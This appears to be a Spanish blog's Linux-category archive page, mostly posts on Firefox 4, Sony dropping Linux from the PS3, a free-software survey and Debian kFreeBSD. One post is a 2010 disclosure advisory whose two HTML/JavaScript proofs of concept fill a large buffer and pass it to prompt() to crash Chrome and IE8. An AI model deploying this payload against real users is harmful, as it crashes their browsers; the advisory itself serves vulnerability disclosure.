Archive for the 'Linux' Category

No os preocupéis, sigo vivo !

Comentaros que aunque no me veáis escribir mucho por aquí ello tiene un signifcado; me estoy centrando más en un blog que comencé hace unos años en forma de proyecto y estoy dejando un poco de lado este, puesto que este es más de carácter personal y aquel más de carácter general por ello publico todo lo relacionado con la informática y algún que otro tema offtopic.

Click sobre la imágen para acceder 🙂

Anuncios

Google Chrome and Chrome frame Prompt DoS

###############################################
Google Chrome and Chrome frame Prompt DoS
Afectado: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Reporte en español: http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Notificación al afectado: Exploit disponible:
###############################################

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de “mensajes de alerta” cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.

###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongruencia en todos los sistemas 🙂

######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)

##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
“window manager button” and we can´t no change beetwen applications
that we have open.

##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)

####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################

<meta http-equiv=”X-UA-Compatible” content=”chrome=1″>
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 38000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>
// <![CDATA[
function do_buffer(payload, len) {
while(payload.length

################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 50000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>

################# EOF ###################

// <![CDATA[
function do_buffer(payload, len) {
while(payload.length ############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
————

thz Lost 😉

Firefox 4: más rápido, más liviano y con mejor diseño

Si le pregunto a mis amigos y conocidos la razón por la cual no usan Firefox el 99,7% (figura no exacta) responde lo mismo: «es muy pesado», «ocupa demasiada memoria» o «Chrome o Safari son más rápidos».

Aún así muchos de nosotros seguimos usándolo porque sabemos que es un buen software, porque soporta estándares, porque tiene un buen soporte de extensiones y themes. Las cosas están próximas a cambiar, de acuerdo a una presentación hecha por Mike Beltzner, Director de Firefox. Mozilla tiene planes grandes para la versión 4 del navegador en tres grandes áreas:

  • Hacer el software más rápido
  • Hacerlo más poderoso: soporte completo de nuevos estándares como HTML5
  • Darles el control total del navegador, sus datos y la experiencia web al usuario (personalización total).

Aunque es posible que muchos de estos planes cambien (pues Firefox 4 sería lanzado a finales de 2010), Mozilla suele hacer públicos todos sus planes a futuro por su filosofia de transparencia total.

En especial llama la atención las intenciones de hacer el navegador más rápido, no solo a la hora de renderizar páginas web, sino de la aplicación en si misma. Durante la presentación, Mike Beltzner explicó que Firefox fue desarrollado enfocándose en la forma en que las computadoras funcionaban en el pasado, pero ahora pretenden aprovechar la aceleración por hardware, versión de 64-bits para Mac OS X y Windows 7 junto al soporte de Aero Peek.

También pretenden el desarrollo de una nueva interfaz gráfica que mejore considerablemente la experiencia del usuario. Esto también parece ser una reacción a la tendencia iniciada por Chrome y Safari de ofrecer interfaces limpias, simples y sólidas que quitan el foco a la aplicación y lo centran en el contenido, en la ventana, en lo que se ve.

Una de las características nuevas en Firefox 4 que probablemente más guste a los usuarios del navegador es que por fin se podrá instalar extensiones sin necesidad de reiniciar. También buscarán maneras de hacer más fácil el proceso de encontrarlas/descubrirlas. También buscan mejoras en el area de la privacidad, dándonos una explicación sencilla y concreta de qué harán las aplicaciones web con nuestros datos y la implementación de un sistema de permisos.

Todos pasos buenos y necesarios; me sigue pareciendo sumamente interesante que la guerra de navegadores no está centrada en “más características” sino en buscar cómo hacer la aplicación más liviana y más rápida, un giro bastante importante en el desarrollo comercial de software.

Seguir leyendo ‘Firefox 4: más rápido, más liviano y con mejor diseño’

Sony alega “problemas de seguridad” y bloquea Linux de sus PS3: insensatez disfrazada de prudencia

La próxima actualización de software para el PlayStation 3 (PS3) será publicada por Sony este jueves 1ro. de abril. No hay nada especial en esto, excepto por este verdadero WTF-ismo: ya no existirá más la opción “Install Other OS”. En otras palabras, Sony estará eliminando la posibilidad de instalar Linux, por ejemplo.

Sony alega:

[“Install Other OS”] estuvo disponible en sistemas PS3 previos a los modelos actuales más delgados […] permitió a los usuarios instalar un sistema operativo, pero debido a problemas de seguridad, Sony Computer Entertainment eliminará esa funcionalidad a partir de la actualización 3.21 […] así los propietarios de sistemas PS3 continuarán teniendo acceso a la amplia gama de juegos y entretenimiento […] en un sistema más seguro [sic].

La recomendación de Sony para quienes tengan instalado “el otro” sistema operativo es hacer un respaldo. Aunque también es posible no actualizar el sistema, la empresa advierte que en este caso no será posible disfrutar de nuevas y “emocionantes” características, ni

La decisión de Sony puede resultar prudente o insensata, según el cristal con que se mire. Es prudente porque intenta proteger sus dos principales intereses:

  • Su propiedad intelectual, en primerísimo lugar, aislándola aún más de los “chicos malos”.
  • Y la seguridad -al menos en apariencia- de su inmensa cantidad de usuarios.

Pero para mí la decisión es insensata, perjudicial y abusiva a todas luces porque

  • Los usuarios no fueron consultados.
  • La seguridad de un sistema también radica en su apertura, o ¿alguien en su sano juicio confía en actos de seguridad por oscuridad?
  • Sony niega el libre acceso al conocimiento y la experimentación con un hardware que tan buenos e interesantes resultados ha ofrecido a científicos, ingenieros, curiosos de la tecnología y usuarios de todo tipo. Esto en sí mismo es un asunto que debe ponerse por encima de muchos otros.

No me puedo quitar de la cabeza que lo que Sony hace es insensatez disfrazada de prudencia, o ¿alguien tiene argumentos a su favor?

Seguir leyendo ‘Sony alega “problemas de seguridad” y bloquea Linux de sus PS3: insensatez disfrazada de prudencia’

La gran parte de los usuarios no entiende lo que es Software Libre

Software-Libre Hace poco se llevó a cabo un estudio estadístico sobre la reacción de los usuarios ante el software libre, y aunque los resultados no son una sorpresa, nos permiten comprender un poco más cuál es el estado de este tipo de programas y sistemas operativos entre los usuarios “entendidos” y “normales”.

El estudio se realizó por medio de Internet con una muestra de 2200 personas de España y América Latina. Habiéndose encuestado a mayores de 15 años, con un 82% de hombres y un 18% de mujeres, la muestra dice tener valor estadístico, aunque la distribución de géneros, si bien debe ser bastante certera entre los usuarios de software libre, no se corresponde demasiado con el usuario “promedio”. Pero eso es tema para los estadísticos. En nuestro caso, vayamos a los resultados, que es lo que nos interesa:

  • El 81% de los encuestados conoce, en mayor o menor medida, que existe el “Software Libre”.
  • Pero sólo un 34% entiende el concepto realmente.
  • De quienes utilizan este tipo de programas, solo un 55% lo hace por la libertad.
  • De este mismo grupo que lo utiliza, un 28% lo utiliza solo por ser gratuito, considerándolo de menor calidad que las versiones pagas.
  • De quienes no usan Software Libre, el 20% lo rechaza por pensar que tienen código malicioso.
  • Del grupo que usó Software Libre y luego lo abandonó, el 16% lo hizo por no recibir soporte adecuado.
  • Y un 75% de los usuarios totales, a la hora de elegir, optarían por programas “privativos” si tienen más funcionalidades.

¿Qué significa todo esto?

En principio, ya que un 81% de los encuestados conozca el software libre es una muy buena noticia, aunque sea solamente de oído. No es extraño que solo el 34% entienda realmente lo que es “libre” (recordemos, libre como libertad, no libre como “gratis”); pensemos que para la gran mayoría de los usuarios, los programas son algo que usan si les viene bien, sin importar qué pueden hacer (o no) con ellos más allá del uso puntual de cada uno. Dentro de todo, 34% es poco, pero es mucho si tenemos en cuenta que “libre” es un concepto que mucha gente no se plantea.

Lo que sí es interesante, es que apenas un poco más de la mitad de quienes sí utilizan este tipo de programas lo haga por la libertad. Teniendo en cuenta que es la bandera con la que los más fanáticos salen a defenderlo, son apenas la mayoría, habiendo un gran grupo al que esta cualidad no le interesa demasiado. El factor económico no es tan importante.

Es desafortunada la asociación que realiza un 20% de los encuestados entre software libre y código malicioso, herencia seguramente de la cantidad de programas de malware y adware que, por ser “gratuitos”, seguramente confunde a los usuarios que no tienen en claro la –enorme– diferencia. Sí me parece bueno que solo un 16% haya abandonado el software libre por falta de soporte. El número es bastante bajo, señal del gran trabajo que realiza la comunidad para ayudarse entre sí.

Y por último, el veredicto final: lo que más importa al 75% de las personas es la funcionalidad del programa, estando dispuestos a pagar por él (y perder ciertas libertades) con tal de que sirva para lo que tiene que servir. En todo caso, es cuestión de poder ofrecer (y encontrar) alternativas libres tan buenas como las privativas. O mejores.

Pueden descargar el informe en PDF, realizado por la web Portal Programas. No se extrañen si ven algunas aparentes discrepancias con los números; los porcentajes van cambiando de grupo: “Todos los encuestados”, “Quienes saben lo que es el SL”, “Quienes usan SL”, etc.

Y yo pregunto; ¿Qué les parece a ustedes? ¿Cómo lo ven los usuarios “completos” de software libre? ¿Y quienes utilizan solamente programas “privativos”?
Seguir leyendo ‘La gran parte de los usuarios no entiende lo que es Software Libre’

Convierte tu Ubuntu en Windows 7 fácilmente

ubuntuwin7

Hace unos días un usuario de Gnome Look creó un paquete con el objetivo de convertir un escritorio de Ubuntu en uno que aparente ser Windows 7. La verdad es que el resultado engaña, por lo menos, a la vista (gracias por los aplausos).

Hace uso de GnoMenu para imitar el menú de inicio y de Dockbar como barra de tareas. Incluye tema para el gestor de login, iconos, cursores, fondos de pantalla, sonidos, fondos para el panel GNOME y finalmente un tema para GTK. Puedes encontrar tanto GnoMenu como Dockbar en PPAs (GnoMenu, Dockbar) así que no es necesario que utilices los que vienen en el paquete, que están en forma de código fuente.

No sé si la proximidad con Halloween tendrá algo que ver con todo esto o si se trata de una simple coincidencia, pero sea como fuere no soy yo quién para juzgar a quien le guste jugar con este peculiar disfraz.

Seguir leyendo ‘Convierte tu Ubuntu en Windows 7 fácilmente’

La próxima versión de Debian también saldrá con núcleo FreeBSD

debiangnukfreebsd

Debian ha anunciado hoy que la próxima versión de la distribución, apodada Squeeze, verá la luz por primera vez con el núcleo de FreeBSD además del habitual núcleo Linux. Esta variante del sistema se llamará Debian GNU/kFreeBSD y estará disponible tanto para i386 como para amd64.

Debian 6.0 Squeeze tiene previsto su lanzamiento para la primavera de 2010. Es imposible que esta nueva variante suponga un solo retraso en el lanzamiento, en Debian jamás permitirían nada así. Podéis comprobarlo en el anuncio, donde dicen claramente que «los fallos graves en estas arquitecturas serán considerados críticos para la publicación al mismo nivel que los fallos en otras arquitecturas». Oh, espera…

Hace varios años que está en desarrollo también otra variante llamada Debian GNU/Hurd, es decir, otra versión utilizando el núcleo Hurd. De momento no se ha anunciado que se vaya a publicar una versión estable (y yo no esperaría ningún anuncio de ese tipo en los próximos años tampoco).

Por último, un detalle curioso: Los más observadores habrán notado la presencia de esa «k» en el nombre de Debian GNU/kFreeBSD. Viene a significar que se utiliza únicamente el núcleo (kernel) del sistema FreeBSD, no el sistema entero.

Vía | Bitelia


Blog Stats

  • 613,065 visitas

RSS

Feed
noviembre 2017
L M X J V S D
« Sep    
 12345
6789101112
13141516171819
20212223242526
27282930  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker